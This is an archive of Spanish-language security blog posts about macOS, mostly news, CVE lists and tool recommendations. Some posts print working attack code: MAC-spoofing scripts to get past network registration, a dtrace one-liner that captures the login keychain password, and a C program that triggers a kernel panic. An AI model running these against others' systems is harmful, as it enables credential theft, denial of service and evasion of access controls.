Este blog ya no está activo, sigue informándote aquí:

Mostrando entradas con la etiqueta Mac. Mostrar todas las entradas
Mostrando entradas con la etiqueta Mac. Mostrar todas las entradas

lunes, 28 de noviembre de 2016

Pss MACchanger a mi ..

Otro día mas sin Wifi y ahora me entero que estamos en la moda de registrar equipos por direcciones MAC ... como no se puede cambiar ... de ninguna manera. Es mas, yo en verano [no subí ningún script] para hacer esto mismo cada vez que queríamos lanzar un ataque. 


Así que me he puesto a pensar y a no ser que con la MAC generen un certificado digital, cualquiera podría probar a cambiarse esta dirección de manera aleatoria hasta conseguir conectarse. Pero aparte de eso, esto me ha hecho darme cuenta de que aparte de usar MACchanger ... no tenia ni idea de hacerlo manualmente. 

Bueno, de esta manera no me iré a dormir sin saber una cosa mas y ya puedo hacerme mi propio MACchanger: 
  • Script para Windows cambiando el 0007 (ver en el registro de windows) por el numero de tu interfaz y el 002622D90EFC por la MAC que quieras poner:
@echo off
netsh interface set interface "Local Area Connection" disable 
 
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}\0007 /v NetworkAddress /d 002622D90EFC /f  
netsh interface set interface "Local Area Connection" enable

  •  Script para Linux cambiando 02:01:02:03:04:08 por la MAC que queramos:  
ifconfig eth0 down
ifconfig eth0 hw ether 02:01:02:03:04:08 
ifconfig eth0 up
Sed Buenos ;) 

martes, 28 de junio de 2016

Guia.- Privacidad y Seguridad en MacOSX

Ya os he aburrido mucho con guías de hardening de ubuntu en 10 minutos y creo que ya ha llegado la hora de que os recomiende una guía para el sistema operativo mas olvidado en este blog. Os hablo de MacOSX (Por si ni habíais leído el título xD)


Ya sabéis que la seguridad informática depende del grado de vulnerables que nos sintamos, por lo que no todos estos consejos pueden aplicarte. Aunque lo que si que te aplican para todos los sistemas operativos que toques son los "Basics".
  1. Create a threat model
  2. Keep the system up to date
  3. Encrypt sensitive data
  4. Frequent backups
  5. Click carefully
Ultra-recomendable, así que aquí teneis el enlace a la guía:

Sed Buenos ;) 

viernes, 19 de febrero de 2016

Infografia.- 10 Años de Malware en Mac

Bueno hacia mucho que no subía una infografía hoy y viendo la desinformación que sigue habiendo en la seguridad de los Macs creo que es la hora de recordar los 10 años de Malwares sonado que a tenido y como mejor hacerlo que con una imagen. 

https://www.intego.com/mac-security-blog/10-years-of-mac-malware-how-os-x-threats-have-evolved/


Si, hoy he pasado por delante de una tienda popular donde vendían Macs y he tenido que aguantar los típicos comentarios de lo bueno que son. Así que,  y siempre como mi opinión, los Mac OS X es un buen sistema pero se ha de proteger siempre. 

Sed Buenos ;)

lunes, 8 de febrero de 2016

Paper.- Inside Mac Security

Bueno, otra entrada de patatas, refresco y papers. Hoy os recomiendo el siguiente Paper de la mano de SANS donde hacen un completo repaso a la seguridad de los Mac y la verdad es que mas de uno nos lo tendríamos que leer a fondo antes de hablar. Note se que he escrito nos con lo cual me incluyo.


Abstract:
"Mac OS X includes many unique security technologies ranging from the Keyring system, integrated Kerberos, application and network firewalls, code signing, anti- malware and exploitation resistance technologies, and Internet client application security to many commands (client and server) specific to Macintosh systems that support the security systems including those for certificate management, firewall configuration, drive imaging and encryption. We introduce the Mac OS X security systems and discuss the built-in tools with deliberate focus on the system utilities and command line tools used by security professionals."

Enlace al Paper:
 Sed Buenos ;) 

jueves, 22 de octubre de 2015

Actualizaciones de Seguridad Para iOS, Safari, MacOSX (¡ACTUALIZA!)

Hace mas o meno medio mes fui al barbero de toda la vida, el sabe de lo que trabajo y como le gusta la tecnología a veces me preguntas por cosas curiosas o por pequeñas dudas que tenga el.  Bueno, el otro día me pregunto el porqué no se utilizaban Macs para trabajar en las empresas si estaba demostrado que eran mucho mas seguros y resistentes. 


Ya podéis adivinar cual fue mi respuesta pero, aprovechando que ayer Apple lanzo unos cuantos boletines de seguridad, hoy quiero centrarme en todas las vulnerabilidades de iOS, Safari, MacOSX que se han notificado este mes para que si hay alguien que piense que los productos Apple no tienen fallos de seguridad esta muy equivocado. 

iOS:
  • CVE-2015-5940: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario. 
  • CVE-2015-7006: Un fallo al desempaquetar un archive malicioso permite ejecutar código arbitrario.
  • CVE-2015-7023 : Vulnerabilidad que permite a una página maliciosa permite que las cookies sean sobrescritas.
  • CVE-2015-7015 : Vulnerabilidad que permite a una aplicación maliciosa elevar sus privilegios.
  • CVE-2015-5925 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5926 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6975 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6992 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7017 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario..
  • CVE-2015-6995 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema. 
  • CVE-2015-5927 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-5942: Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6976 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6977 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6978 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6990 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6991 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6993 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7008 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7009 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7010 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-7018 : Un fallo al procesar un archive de fuente malicioso permite ejecutar código arbitrario.
  • CVE-2015-6979 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-6989 : Un fallo al procesar un paquete específicamente creado permite ejecutar código de manera arbitraria. 
  • CVE-2015-6986 : Un fallo al ejecutar una aplicación maliciosa permite ejecutar código arbitrario dentro del Kernel de Linux.
  • CVE-2015-5935 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario. 
  • CVE-2015-5936 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario. 
  • CVE-2015-5937 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario.
  • CVE-2015-5939 : Un fallo al ver una imagen maliciosa permite ejecutar código arbitrario.
  • CVE-2015-6996 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-6974: Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema
  • CVE-2015-7004 : Vulnerabilidad que permite causar una denegación de servicio en local
  • CVE-2015-6988 : Un fallo permite a un atacante con una posición privilegiada en la red ejecutar código arbitrario. 
  • CVE-2015-6994 : Vulnerabilidad que permite causar una denegación de servicio en local.
  • CVE-2015-7000 : Vulnerabilidad que permite que aparezcan notificaciones de llamadas y mensajes en la pantalla de bloqueo. 
  • CVE-2015-5924 : Visiting a maliciously crafted website may lead to arbitrary code execution
  • CVE-2015-6983 : Un fallo al procesar un archive de fuente malicioso permite sobrescribir archivos.
  • CVE-2015-6999 : Un fallo permite al atacante que un certificado revocado aparezca como válido. 
  • CVE-2015-7022 :Vulnerabilidad que permite a una aplicación maliciosa filtrar información del usuario. 
  • CVE-2015-5928 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5929 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-5930 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6981: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-6982: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7002 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7005 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario. 
  • CVE-2015-7012 : Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.
  • CVE-2015-7014: Vulnerabilidad que permite a una página maliciosa ejecutar código arbitrario.

Productos afectados:
  • iPhone 4s and later, iPod touch (5th generation) y anteriores, iPad 2 y anteriores. 
Más información:
Solución:

  • Esta actualización ya está disponible desde el Software Update o el Apple Downloads site.

Safari:
  • CVE-2015-5928 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5929 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5930 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-5931: Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7002 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7011 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7012 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7013 : Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 
  • CVE-2015-7014: Un fallo en WeKit al visitar una página web maliciosa permite la ejecución remota de código. 

Productos afectados:

  • OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, y OS X El Capitan v10.11 

Más información:

Solución:
  • Apple ha publicado la versión 9.0.1 de Safari y ya está disponible desde la Mac App Store.

MacOSX:
  • CVE-2015-5940 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-0235: Múltiples vulnerabilidades en PHP 
  • CVE-2015-0273: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6834: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6835: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6836: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6837: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6838: Múltiples vulnerabilidades en PHP 
  • CVE-2015-6985 : Un fallo al visitar una página web maliciosa permite el inesperado cierre de una aplicación o la ejecución arbitraria de código. 
  • CVE-2015-7003 : Un fallo en coreaudiod permite la no inicialización de la memoria. 
  • CVE-2015-5933 : Un fallo en la ejecución de un archivo de audio permite la ejecución remota de código. 
  • CVE-2015-5934 : Un fallo en la ejecución de un archivo de audio permite la ejecución remota de código. 
  • CVE-2015-7006 : Un fallo en el desempaquetado de un archive malicioso permite la ejecución arbitraria de código. 
  • CVE-2015-7023 : Un fallo al visitar una página web especialmente creada permite sobrescribir las cookies. 
  • CVE-2015-7015 : Vulnerabilidad que permite a una aplicación maliciosa elevar sus privilegios. 
  • CVE-2015-5925 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-5926 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-6992 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6975 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7017 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-5944 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6995 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema 
  • CVE-2015-7035 : Vulnerabilidad que permite a aun atacante ejecutar funciones EFI 
  • CVE-2015-6987 : Un fallo en navegar con marcadores especialmente creados permite el cierre inesperado de la aplicación. 
  • CVE-2015-5927 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-5942: Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6976 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6977 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6978 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6991 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6993 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7009 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7010 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-7018 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario. 
  • CVE-2015-6990 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario 
  • CVE-2015-7008 : Un fallo en el proceso de un archive de Fuente especialmente creado permite la ejecución de código arbitrario 
  • CVE-2015-6989 : Un fallo en el proceso de paquetes especialmente creados permite la ejecución de código arbitrario. 
  • CVE-2015-7019 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-7020 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-7021 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario con privilegios del kernel. 
  • CVE-2015-5935 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5938 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5936 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5937 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-5939 : Un fallo en el proceso de un archive de imagen permite la ejecución de código arbitrario. 
  • CVE-2015-6996 : Vulnerabilidad que permite a una aplicación maliciosa ejecutar código arbitrario con privilegios del sistema. 
  • CVE-2015-6974 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario. 
  • CVE-2015-5932 : Vulnerabilidad que permite a un usuario local causar el cierre inesperado del Sistema o leer la memoria del kernel. 
  • CVE-2015-6988 : Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar código arbitrario 
  • CVE-2015-6994 : Vulnerabilidad que permite a un usuario local causar una denegación de servicio. 
  • CVE-2015-6984 : Vulnerabilidad que permite a una aplicación maliciosa sobrescribir archivos de forma arbitraria. 
  • CVE-2012-6151: Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar una denegación de servicio. 
  • CVE-2014-3565: Vulnerabilidad que permite a un atacante con una posición privilegiada en la red ejecutar una denegación de servicio. 
  • CVE-2015-5924 : Un fallo al visitar una página web maliciosa permite la ejecución de código arbitrario. 
  • CVE-2015-6563 : Vulnerabilidad que permite a un usuario local provocar ataques no definidos. 
  • CVE-2015-5945 : Vulnerabilidad que permite a un usuario local ejecutar código arbitrario con privilegios del kernel. 
  • CVE-2015-7007 : Vulnerabilidad permite correr AppleScripts de forma arbitraria. 
  • CVE-2015-6983 : Vulnerabilidad que permite a una aplicación maliciosa sobrescribir archivos de forma arbitraria 
  • CVE-2015-5943: Vulnerabilidad que permite a una aplicación maliciosa controlar los keychain access prompts 

Productos afectados:
  • OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, y OS X El Capitan 10.11 

Más información:

Solución:

Bueno, también supongo que a alguien le servirá esta información pero que nadie me diga que los productos Apple son robustos y no tienen fallos de seguridad.

Sed Buenos ;) 

viernes, 25 de septiembre de 2015

Mac4n6 Group.- Colección De Localizaciones Forenses Para Mac y iOS

Mac4n6 Group, aunque parezca el nombre de una sociedad secreta, no deja de ser un repositorio donde toda la gente que quiera contribuir puede dejar recursos que ayuden al peritaje forense de dispositivos Mac y iOS. La verdad es que me parece una iniciativa genial ya que normalmente la información para este tipo de peritaje esta disuelta y cada perito tiene sus propias herramientas o script. Así que, un repositorio para congregaros a todos es la mejor opción para no perder el tiempo si estas trabajando.


Extracto del readme del repositorio:
"The idea is to create one single point of collection for OS X and iOS artifacts location, trying to collect more information for each artifact, not just a path!" 
"The motto? Reusable format. The goal is that the information collected have to be “machine parsable” and mostly “human readable/writable”, reusable by any application, library, etc. (am I too optimistic?). That is why as main collaboration tool for the collection, we use a shared spreadsheet so that anyone can add new artifacts, there is no need to know how to code to contribute to this project (so, no excuses!). From here, two (simple) scripts will convert the csv file into:
  • yaml artifact library file, so that other applications can use it. No crapy/fancy xml things.
  • ForensicsWiki page, one of the point of reference for forensics practitioners."

"This way the effort is centralized and made only once."

Enlace al repositorio:
Espero que os sea útil. al menos a mi me ha sorprendido y si conocéis mas iniciativas como esta no dudéis en utilizar la caja de sugerencias, los comentarios o contactar-me por algún lado.

Sed Buenos ;)

domingo, 28 de junio de 2015

Pac4Mac (Plug And Check para Mac OS X)

Esta entrada no es mas que un aporte que hicie en le foro de Undercode y me gustaría compartir contigo ya que he hablado muchas veces de como hacer Forenses en Linux y en Windows pero nunca he tocado Mac OS X. 

Pac4Mac es una herramienta para extraer y analizar información de un MAC OS X (vamos para hacerle un forense en condiciones) Ademas, esta bajo una Apache License 2.0.




Os dejo con las features de Pac4Mac :

• Developed in Python 2.x (natively supported) 
• Framework usage
• Support of OS X 10.6, 10.7, 10.8 and 10.9 (not tested)

Data extraction through:

• User or Root access
• Single Mode access
• Target Mode access (Storage media by Firewire or Thunderbolt)

It use 3 dumping modes : Quick, Forensics, Advanced: 

• Dumping Users / User Admin

• Dumping Mac's Identity (os version, owner)

• Dumping Miscellaneous files (Address book, Trash, Bash history, stickies, LSQuarantine, AddressBook, Safari Webpage Preview, Office Auto Recovery, WiFI access history, …)
• Dumping content of current Keychain (security cmd + securityd process)
• Dumping Users Keychains

• Dumping System Keychains

• Dumping password Hashes

• Live Cracking hashes password
s
• Dumping Browser Cookies (Safari, Chrome, Firefox, Opera)

• Dumping Browser Places (Safari, Chrome, Firefox, Opera)

• Dumping Browser Downloads history (Safari, Chrome, Firefox, Opera)

• Dumping printed files

• Dumping iOS files backups

• Dumping Calendar and Reminders / Displaying secrets
• Dumping Skype messages / Displaying secrets on demand
• Dumping iChat, Messages(.app), Adium messages
• Dumping Emails content (only text)

• Dumping Emails content of all or special Mail Boxes
• Adding root user
• Dumping RAM
• Cloning local Disk
• Dumping system logs, install, audit, firewall

DMA access features (exploitation of Firewire and Thunderbolt interfaces)

• Unlock or bypass in writring into RAM
• Dumping RAM content
• Exploit extracted data (see Analysis module)

Analysis module in order to easily exploit extracted data by one of dumping modes

• Exploit Browser History
 x 4 (Displaying recordings, Local copy for usurpation)
• Exploit Browser Cookies
 x 4 (Displaying recordings, Local copy for usurpation)
• Display Browser Downloads
 x 4 (Displaying recordings)
• Exploit Skype Messages
 (Displaying/Recording all recorded messages, with secret information or containing a special keyword)
• Exploit iChat, Messages(.app), Adium messages (in the next version)
• Exploit Calendar Cache
 (Display/Recording all recorded entries, with secret information or containing a special keyword)
• Exploit Email Messages (Displaying/Recording all recorded messages, with secret information or containing a special keyword / )
• Exploit RAM memory Dump
 (Searching Apple system/applications/Web Passwords)
• Exploit Keychains
 (Display content Keychain
, Crack Keychain files)
• Crack Hashes passwords

• Exploit iOS files
 (Accessing to iPhone without passcode, reading secrets through iTunes backups)
• Display Stickies Widgets

• Display Printed Documents
• Display prospective passwords 
(displaying all found passwords during dump and analysis phases)

Etc. 

Más Información: 




Código fuente: 




Y un pequeño regalo para los que hayáis llegado a leer todo el post, aqui teneis todos los TIPS que se han utilizado para extraer y analizar la información para esta herramienta: 


miércoles, 24 de junio de 2015

Un Sniffer Para Apple Mac OS X En 140 Caracteres.

Hoy, ya que es un día de fiesta, me he decidido ha hacer una entrada mas normal fuera del Road To The CEH, así que me he decidido a curiosear mis redes sociales a la búsqueda de alguna noticia, articulo o paper que me llamara la atención. 


Pero, que hay mas curioso que un Sniffer cuyo comando de ejecución cabe en menos de 140 caracteres (138 para ser exactos, vamos un Tweet). Este Sniffer funciona en local y solamente en Mac OS X. Ya hay algunas versiones confirmadas, os las detallo mas abajo. 

Código del Sniffer: 

sudo dtrace -n 
'pid$target::SecKeychainLogin:entry{trace(copyinstr(uregs[R_ECX]));}' -p $(ps -A | grep -m1 loginwindow | awk '{print $1}')

Solo necesitaríamos ejecutar el "código" bloquear nuestro Mac y ver como ha sido capaz de sacar nuestra contraseña.

Versiones confirmadas de Mac OS X:
  • 10.10
  • 10.11β2
  • 10.9.5.
  • 10.10.3.
Fuente: 

sábado, 21 de febrero de 2015

Kernel Panic en Mac OS X Con Solo 10 lineas de Código

Ya que supongo que esta asumido que en los productos Apple también hay Malware, también os diré que Mac OS X también se pude colgar con muy pocas lineas de código. Ademas, escritas en C.


Estas son este es el código que nos permitirá hacernos unas risas con cualquiera que utilice un Mac Os X en cualquiera de las últimas versiones:

#include <unistd.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach-o/dyld.h>

int
main (int argc, char * argv[])
{
  volatile char * library;
  const mach_vm_size_t page_size = getpagesize ();
  const mach_vm_size_t buffer_size = 3 * page_size;
  char buffer[buffer_size];
  mach_vm_size_t result_size;

  library = (char *) _dyld_get_image_header (1);
  mach_vm_protect (mach_task_self (), (mach_vm_address_t) (library + page_size), page_size, FALSE, VM_PROT_READ | VM_PROT_WRITE | VM_PROT_COPY | VM_PROT_EXECUTE);
  library[page_size]++;
  library[page_size]--;
  result_size = 0;
  mach_vm_read_overwrite (mach_task_self (), (mach_vm_address_t) library, buffer_size, (mach_vm_address_t) buffer, &result_size);

  return 0;
}

Más Información sobre el script:

Sed Buenos con esto ;) 

domingo, 23 de noviembre de 2014

Imagen.- ¿Y Tu De Quien Eres?

Hoy ha sido una tarde muy bien aprovechada ya que hemos estado programando con el amigo Snifer una App para Android y Firefox OSque a los usuarios de Python o a los mas noveles seguro que os va a gustar. 



Así que mientras Snifer me estaba diciendo que me tenia que leer [la guía del developer] de Firefox OS, he encontrado esta imagen que, aparte de hacerme mucha gracia, resulta bastante cierta. 


Sed Buenos y pensad en si es o no verdad esta imagen. ;) 

lunes, 10 de noviembre de 2014

iOS/OSX.- WireLurker La Nueva Moda Del Malware.

Ya es sabido que en este blog no hablo mucho de Apple a no ser que la noticia valga la pena y esta lo vale. 

WireLurker es un malware capaz de instalar contenido en smarthpones con iOS  con Jailbreak y OSX. Vamos que es capaz de instalarte cualquier cosa que el quiera sin que tu te enteres. 



"WireLurker puede instalar aplicaciones de terceros en dispositivos iOS con Jailbreak y OS X, según comentó la gente de Palo Alto. Este malware ha sido descubierto por [Claud Xiao de Unit 42], el equipo de inteligencia de amenazas de la empresa, que ha publicado un informe detallado denominado [WireLurker: Una nueva era en el malware para iOS y OS X]. A raíz del descubrimiento inicial por un desarrollador, investigadores de la empresa el impacto potencial de WireLurker, evaluando métodos disponibles para prevenir, detectar, contener y eliminar la amenaza."
Apple ya se a puesto manos a la obra paar bloquearlo:

Pero, una cosa es bloquearlo y la otra es detectarlo y eliminarlo. ¿Como podemos saber si hemos sido infectados? Bueno, ya han ido saliendo herramientas pero me voy a centrar en recomendaros, como no, una herramienta desarrollada en Python. WireLurkerDetector hecha por la gente de PaloAltoNetworks. 

Decarga tanto para OSX como para Windows: 
Sed Buenos y repasad vuetros iOS/OSX y Windows. 

miércoles, 4 de junio de 2014

K0SASP.- Hacking En Mac OS X

Muy poco sabréis mi firme intención de pasarme una larga temporada usando Linux después de los exámenes pero lo que aún sabréis menos es mi objetivo de comprarme un Mac OS X para aprender y convivir con otro sistema y valorar los pros y los contras por mi mismo. 


Viendo un poco hacia el futuro y después de varias pasadas por blogs o paginas de otros apasionados con la seguridad informática me he topado con K0SASP (Kontrol0-Security Auditor Software Pack) un paquete de instalación que nos proveerá el software necesario para nuestras auditorias de seguridad ademas de ser funcional en MacOS X y tener un menú muy bonito. 



¿Qué Software tendremos si usamos K0SASP?

Information Gathering
  • TheHarvester
  • Nmap
  • Zenmap
  • Maltego
  • Knock-scan
  • Keepnote
  • Dnsmap
  • DMitry
Exploitation
  • Network
    • Metasploit
    • Setoolkit
  • Web Exploitation
  • Burp Suite
  • DirBuster
  • Sqlmap
  • ncat
  • Fimap
  • weevely
  • Slowhttptest
  • Wapiti 
  • Webscarab
  • wfuzz 
Sniffing
  • TCPDump
  • Wireshark
  • Sslstrip
Anonymity
  • Tor+TorBrowser
Password Cracking
  • Hydra
  • John The Ripper
Connections
  • Cyberducks
  • DBeaver
Forensic Analysis
  • Binary Cookie Reader
  • iExplorer
  • SQLite Database Brownser
Vulnerability Analysis
  • Owasp ZAP
  • Vega
  • Nikto
  • GoLISMERO
  • Joomscan

Software requerido
  • PyGTK
  • XQuartz
  • Command Line Tools

La verdad es que K0SASP va a ser una de las primeras piezas de Software que tenga mi equipo con Mac OS X es sencillo, practico y con las herramientas necesarias para trabajar. Sencillamente, me encanta. 

Mas información y fuente de la herramienta: 
No dejéis de echarle un ojo a su libro sobre BackBox3 que merece muchísimo la pena.

Sed Buenos con esto ;) 


viernes, 28 de septiembre de 2012

Mac y El Problema Su "Super-Seguridad"

Tan malo es admitir tus fallos de seguridad como fanfarronear de que no los tienes. Advierto desde aquí que todo equipo que se conecte a la Internet va a ser atacado de una manera o otra. Todo requiere tiempo. Con esta frase me refiero a que si presumes de una tecnología que un día puede ser rota en realidad estas dando una falsa seguridad a tus usuarios. 


Esto vienen en referencia a un articulo de RedesZones donde se explica que 600.000 equipos han sido ya afectados por el malware y que a día de hoy esa fecha es mucho mas grande de lo que pensamos. El tema es que esta botnet "ya esta muerta" según un informe sacado en marzo.

Aparte de eso, a mi me gustaría saber cuantos des esos usuarios de Mac saben que su equipo a sido troyanizado o el riesgo que supone que se haya demostrado la "portación" de virus de PC a Mac OsX ... 

Bueno, para acabar solo quiero mencionar unas frases que dijo Chema Alonso en una de sus múltiples conferencias y que a nosotros no hizo especial gracia:
 "Estoy seguro en internet? - Te podria mentir y decirte: Si. O te podría mentir mas y decirte: Si y con un antivirus. O te podria mentir mucho mas y decirete: Si, con un antivirus y sentido comun lo tienes solucionado. O ya mentirte en tu cara y decirte: No mira ponte un Mac que vas a estar seguro."

martes, 25 de septiembre de 2012

Ubuntu, Windows y Mac A Donde Vais?

Hace días, recopilando información sobre como funcionan los MDM (Mobile Device Management) y sobretodo los numerosos fallos de seguridad que se han encontrado tanto en IOs 6 como en el Samsung Galaxy S3, me he dado cuenta de por donde estas hiendo tan magnas compañías.

Cada una de esas 3 empresas esta preparando el salto a los sistemas híbridos. Sistemas en el que pueda funcionar un S.O. al máximo de su potencial con el hardware de un PC completo y que al sacar la tablet incorporada al equipo podamos llevarnos nuestro propio S.O con los archivos a nuestra elección ya copiados, nuestra configuración, etc y que corra con un hardware mas pequeño. Que no os lo creeis, atentos al nuevo anuncio de Windows 8


El único que mas o menos se quiere despuntar un poco es Ubunto que nos ofrece un mobil terminal con el que no solo tendremos el sistema operativo basado en Debian sino que al pincharlo a un adaptador podremos tener la ultima versión de Ubuntu corriendo en la televisión de nuestra casa y corriendo con solo 512 de Ram. La verdad es que merece ser visto y catado.


Bueno pues con todos estos indicios y con alguna que otro miedo de que con todos estos bugs que tienen los dispositivos móviles alguno se pueda colar dentro del sistema MADRE (llamemoslo así que hoy estoy sembrado) y hagan estragos con toda la información que allí disponemos.